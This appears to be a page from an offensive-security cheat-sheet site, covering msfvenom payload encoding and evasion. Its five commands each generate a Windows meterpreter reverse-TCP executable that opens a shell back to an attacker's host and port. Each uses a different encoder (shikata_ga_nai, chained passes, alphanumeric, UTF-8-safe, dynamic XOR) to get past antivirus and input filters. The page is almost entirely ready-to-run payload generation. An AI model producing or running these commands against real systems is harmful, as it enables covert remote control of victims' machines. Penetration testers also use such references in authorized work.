🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ’£ msfvenom / Encoding & Evasion

Encoding & Evasion

shikata_ga_nai β€” polymorphic XOR (most common)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe

Chained encoding (multiple passes)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/shikata_ga_nai -i 3 -e x86/call4_dword_xor -i 2 -f exe > chained.exe

Alpha-numeric β€” bypasses character filters

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/alpha_mixed -f exe > alpha.exe

Avoid UTF-8 tolower transforms

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/avoid_utf8_tolower -f exe > utf8safe.exe

Dynamic XOR key

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/xor_dynamic -f exe > xor.exe